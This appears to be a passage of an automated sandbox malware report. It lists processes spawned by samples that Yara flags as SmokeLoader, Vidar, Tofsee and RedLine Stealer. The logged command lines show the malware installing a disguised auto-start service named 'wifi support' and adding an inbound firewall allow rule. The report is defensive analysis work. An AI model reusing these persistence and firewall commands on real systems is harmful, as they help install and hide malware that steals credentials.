                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:13
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:301056 bytes
                                                                                                                                                                                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 46%, Metadefender, Browse
                                                                                                                                                                                                            • Detection: 77%, ReversingLabs
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:16
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:16
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:18
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:327680 bytes
                                                                                                                                                                                                            MD5 hash:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:19
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
                                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:21
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:313344 bytes
                                                                                                                                                                                                            MD5 hash:2650E6FA017E57264E55CB0078639A13
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:24
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x370000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: moderate

General

Start time: 23:29:27
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:28
Start date: 13/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:28
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:29
Start date: 13/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:29
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase: 0x13c0000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:29
Start date: 13/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:30
Start date: 13/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:31
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
Imagebase: 0x13c0000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:31
Start date: 13/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:32
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\sc.exe" start uuqefjyt
Imagebase: 0x13c0000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:32
Start date: 13/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:29:33
Start date: 13/01/2022
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase: 0x9e0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:33
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:14635008 bytes
                                                                                                                                                                                                            MD5 hash:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:33
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:38
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                            File size:44520 bytes
                                                                                                                                                                                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:41
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                            Imagebase:0x7ff6b7590000
                                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:41
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x250000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:23:29:46
                                                                                                                                                                                                            Start date:13/01/2022
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Imagebase:0x9b0000
                                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                            Reset < >